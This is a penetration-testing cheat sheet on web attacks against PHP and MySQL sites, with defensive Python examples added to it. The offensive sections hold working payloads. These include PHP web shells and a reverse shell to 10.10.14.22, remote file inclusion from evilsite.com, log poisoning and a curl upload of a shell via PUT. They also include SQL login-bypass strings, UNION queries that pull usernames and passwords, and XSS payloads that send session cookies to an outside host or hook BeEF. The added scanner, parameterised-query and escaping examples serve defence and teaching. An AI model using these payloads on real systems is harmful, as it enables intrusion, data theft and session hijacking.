# web.md

File metadata and controls

180 lines (145 loc) · 4.63 KB

## PHP

A good overview of all of this: https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

### LFI/RFI tricks

Sometimes you can run commands through these LFIs, like in this old exploit:

```bash
curl -s --data "<?system('ls -la');?>" "http://www.site/path/crapco_comment_system/admin.php?CCS_path=php://input%00"
```

- List of possible Apache directories: http://wiki.apache.org/httpd/DistrosDefaultLayout
- Include the access log via a file descriptor, `/proc/self/fd/XX`: http://pastebin.com/raw.php?i=cRYvK4jb
- Include email log files: http://devels-playground.blogspot.de/2007/08/local-file-inclusion-tricks.html
- Include the SSH `auth.log`
- Abuse avatar/image/attachment file uploads
- Include session files: https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/
- Include PHP's temporarily uploaded files: http://gynvael.coldwind.pl/?id=376

- Null byte injection: `?file=../../../../../../../../../etc/passwd%00`
- Path truncation: `?file=../../../../../../../../../etc/passwd...........\ ...`
- Dot truncation: `?file=../../../../../../../../../etc/passwd...........`
- Reverse path truncation: `?file=../../../../ […] ../../../../../etc/passwd`
- Including remote code: `?file=[http|https|ftp]://evilsite.com/shell.txt`
- Using the PHP stream `php://input`: `?file=php://input`, with the payload in the POST body
- Using the PHP stream `php://filter`: `?file=php://filter/convert.base64-encode/resource=index.php`

### Logfile injection

Don't forget that you may be able to connect to the server and write code into its log files. This may also work with emails if you can view them.

```text
nc <IP> <port>
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: <IP>
Connection: close
```

Afterwards, include it via the LFI: `?lfi_file=/var/log/apache2/access.log&cmd=<command>`

### LFI wrapper: zip

```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php
```

http://example.com/index.php?page=zip://shell.jpg%23payload.php

### RFI wrapper: data with a base64-encoded PHP payload

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAh
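The inclusion tricks listed above, the log-file injection and the zip/data wrappers all leave a characteristic trace in the web server's access log. As an added example (not part of the original notes), the following Python script scans constructed Apache-style log lines for those traces: it percent-decodes each request target twice, then flags null bytes, traversal sequences, dot truncation, stream wrappers, remote URLs, sensitive file paths and PHP tags sent in the request line (the log-poisoning signature). The log lines, client addresses and parameter names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache-style access-log lines (hypothetical client addresses,
# paths and parameter names) echoing the inclusion tricks listed above. Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.6 - - [10/Oct/2023:13:55:37 +0000] "GET /index.php?file=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1024
10.0.0.7 - - [10/Oct/2023:13:55:38 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048
10.0.0.8 - - [10/Oct/2023:13:55:39 +0000] "GET /index.php?page=zip://shell.jpg%23payload.php HTTP/1.1" 200 300
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?lfi_file=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 300
10.0.0.10 - - [10/Oct/2023:13:55:41 +0000] "GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1" 404 200
10.0.0.11 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?file=http://evilsite.com/shell.txt HTTP/1.1" 200 300
"""

# The request line inside the log entry: method, target, protocol version.
REQUEST_RE = re.compile(r'"([A-Z]+) (.*?) HTTP/[\d.]+"')
# PHP stream wrappers that turn a file include into a code/data source.
WRAPPER_RE = re.compile(r"^(php|zip|data|phar|glob|expect|compress\.zlib)://", re.I)
# Remote schemes used for RFI.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.I)
# Two or more ../ (or ..\) segments in a row.
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\){2,}")
# Files that are classic include targets (system files, logs, session storage).
SENSITIVE_RE = re.compile(r"/etc/passwd|/proc/self/|/var/log/|/var/mail/|auth\.log|/sess_", re.I)


def decode(value: str) -> str:
    """Percent-decode twice so double-encoded sequences (e.g. %252e%252e) are seen too."""
    return unquote(unquote(value))


def inspect_target(target: str) -> list:
    """Return a list of indicator labels found in one request target (path plus query)."""
    findings = []
    decoded = decode(target)
    if "<?php" in decoded or "<?=" in decoded:
        findings.append("php-tag-in-request")  # code written into the log for later inclusion
    _, _, query = target.partition("?")
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        value = decode(raw_value)
        if "\x00" in value:
            findings.append(f"{name}: null-byte")
        if TRAVERSAL_RE.search(value):
            findings.append(f"{name}: path-traversal")
        if "...." in value:
            findings.append(f"{name}: dot-truncation")
        if WRAPPER_RE.match(value):
            findings.append(f"{name}: stream-wrapper")
        if REMOTE_RE.match(value):
            findings.append(f"{name}: remote-include")
        if SENSITIVE_RE.search(value):
            findings.append(f"{name}: sensitive-path")
    return findings


def scan_log(text: str) -> list:
    """Scan log text and return one dict per line that carries at least one indicator."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = inspect_target(match.group(2))
        if findings:
            hits.append({"ip": line.split(" ", 1)[0], "target": match.group(2), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], "|", ", ".join(hit["findings"]), "|", hit["target"])
```

`inspect_target` works on a single request target, so the same logic can be reused to test a WAF rule or an application-side allowlist. Double decoding is deliberate: `%2500` decodes to `%00` and only then to a null byte, which is the value the application's own file-open call ends up seeing.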
### More shell examples and snippets

`evil.txt` example to use with any RFI:

```php
<?php echo shell_exec("whoami");?>
```

Or just get a reverse shell directly like this:

```php
<?php echo system("0<&196;exec 196<>/dev/tcp/10.10.14.22/443; sh <&196 >&196 2>&196"); ?>
```

### Other ways to make a shell

```php
<?php $cmd=$_GET['cmd']; system("$cmd"); ?>
<?php echo shell_exec($_GET['cmd']);?>
```

If you use `$_REQUEST`, the parameter can be supplied via either GET or POST:

```php
<?php $cmd=$_REQUEST['cmd']; system("$cmd"); ?>
```

Uploading via HTTP `PUT`:

```bash
curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php
```

```php
<pre><?php system($_GET['c']); die(); ?></pre>
<pre><?php system($_GET['c']) ?></pre>
<?php echo system($_REQUEST['cmd']); ?>
```
## References

https://chryzsh.gitbooks.io/pentestbook/content/web-services.html

## MySQL

Classic authentication bypass strings:

```text
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
```
### SQLi

- Check whether you can find a row where your output is placed: `http://ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8`
- Get the database version: `http://ip/inj.php?id=1 union all select 1,2,3,@@version,5`
- Get the current user: `http://ip/inj.php?id=1 union all select 1,2,3,user(),5`
- See all tables: `http://ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables`
- Get column names for a specified table: `http://ip/inj.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'`
- Concatenate user names and passwords (`0x3a` is `:`): `http://ip/inj.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users`
- Write into a file: `http://ip/inj.php?id=1 union all select 1,2,3,"content",5 into OUTFILE 'outfile'`
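The bypass strings above come in families because each one has to match the way the application wraps the input: a single- or double-quoted literal, with or without surrounding parentheses. As an added example, not from the original notes, this Python script uses SQLite as a stand-in for MySQL with a constructed `users` table and runs three of those variants against two concatenated query shapes, and against a parameterised query, where every variant fails. The MySQL-specific arithmetic variants (`'-'`, `'^'`, and so on) rely on MySQL's string-to-number coercion and do not carry over to SQLite, so they are left out.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    """Create a throwaway in-memory users table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users (name, password) VALUES ('admin', 'correct horse')")
    conn.commit()
    return conn


def _row_exists(conn: sqlite3.Connection, query: str, params=()) -> bool:
    # A payload built for a different quoting context produces a malformed query.
    # Here that is mapped to False; a real application would typically emit a 500,
    # and a burst of such errors from one client is itself worth alerting on.
    try:
        return conn.execute(query, params).fetchone() is not None
    except sqlite3.Error:
        return False


def login_concat_plain(conn, name: str, password: str) -> bool:
    """Vulnerable: input spliced into single-quoted literals, no parentheses."""
    return _row_exists(conn, f"SELECT id FROM users WHERE name='{name}' AND password='{password}'")


def login_concat_paren(conn, name: str, password: str) -> bool:
    """Vulnerable: same splice, but the whole condition is wrapped in parentheses."""
    return _row_exists(conn, f"SELECT id FROM users WHERE (name='{name}' AND password='{password}')")


def login_parameterised(conn, name: str, password: str) -> bool:
    """Fixed: placeholders keep the input as data, whatever quotes it contains."""
    return _row_exists(conn, "SELECT id FROM users WHERE name=? AND password=?", (name, password))


# Three of the bypass strings from the list above, labelled by the context they target.
BYPASS = {
    "plain single-quote": "' or 'x'='x",
    "paren single-quote": "') or ('x')=('x",
    "plain double-quote": '" or "x"="x',
}


def trial(conn) -> dict:
    """For each payload: (bypasses plain query?, bypasses parenthesised query?, bypasses safe query?)."""
    results = {}
    for label, payload in BYPASS.items():
        results[label] = (
            login_concat_plain(conn, "admin", payload),
            login_concat_paren(conn, "admin", payload),
            login_parameterised(conn, "admin", payload),
        )
    return results


if __name__ == "__main__":
    for label, (plain, paren, safe) in trial(setup()).items():
        print(f"{label:20} plain={plain} paren={paren} parameterised={safe}")
```

The double-quote variant fails against both concatenated queries because the application quotes with single quotes, so the payload never leaves the string literal; the parenthesised variant breaks the plain query with a syntax error. The union-based extraction queries in the list above stop working for the same reason once `id` is bound through a placeholder and validated as an integer before the query is built.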

## XSS

Some pretty basic notes here, related to cookie theft.

Start the web server (Python 2; on Python 3 the equivalent is `python3 -m http.server 80`):

```bash
python -m SimpleHTTPServer 80
```

Then use one of the following XSS payloads:

```html
<iframe src="http://10.10.10.10/report" height="0" width="0"></iframe>
```

```html
<script>
new Image().src="http://10.10.10.10/bogus.php?output="+document.cookie;
</script>
```

Or, to use BeEF, inject the hook into an XSS after starting it up:

```html
<script src="http://10.10.14.22:3000/hook.js"></script>
```
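All three payloads above depend on the injected markup being rendered as live HTML, and the cookie-stealing one additionally on `document.cookie` exposing the session cookie. As an added example, not part of the original notes, this Python snippet shows the two corresponding defences: HTML-encoding untrusted content before it is written into a page, and auditing `Set-Cookie` headers for the `HttpOnly` attribute (which keeps the cookie out of `document.cookie`) plus `Secure` and `SameSite`. The cookie names and values are constructed.

```python
import html

# The page's own payloads, used here only as test input for the encoder.
PAYLOADS = [
    '<iframe src="http://10.10.10.10/report" height="0" width="0"></iframe>',
    '<script>new Image().src="http://10.10.10.10/bogus.php?output="+document.cookie;</script>',
    '<script src="http://10.10.14.22:3000/hook.js"></script>',
]

# Attributes a session cookie should carry; HttpOnly is the one that blocks document.cookie.
REQUIRED_ATTRS = ("HttpOnly", "Secure", "SameSite")


def render_comment(untrusted: str) -> str:
    """Encode user content for an HTML body context; quote=True also covers attribute use."""
    return f"<p>{html.escape(untrusted, quote=True)}</p>"


def payloads_neutralised() -> bool:
    """True when none of the payloads survives encoding as a live tag."""
    rendered = [render_comment(p) for p in PAYLOADS]
    return all("<script" not in r and "<iframe" not in r for r in rendered)


def audit_set_cookie(header: str) -> list:
    """Return the protective attributes missing from a Set-Cookie header (or bare header value)."""
    value = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    # First segment is name=value; the rest are attributes, possibly with their own "=value".
    attrs = [part.strip() for part in value.split(";")[1:]]
    present = {attr.split("=", 1)[0].lower() for attr in attrs}
    return [f"missing {name}" for name in REQUIRED_ATTRS if name.lower() not in present]


if __name__ == "__main__":
    print("payloads neutralised:", payloads_neutralised())
    # Constructed headers: a weak one and a hardened one.
    print(audit_set_cookie("Set-Cookie: PHPSESSID=abc123; Path=/"))
    print(audit_set_cookie("Set-Cookie: PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"))
```

`html.escape` is only correct for an HTML body or quoted-attribute context; content placed inside a `<script>` block or a URL needs the encoder for that context instead. The cookie audit is the check to run against a real response: if `HttpOnly` is missing, the second payload above reads the session cookie directly.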

More reading: http://brutelogic.com.br/blog/probing-to-find-xss/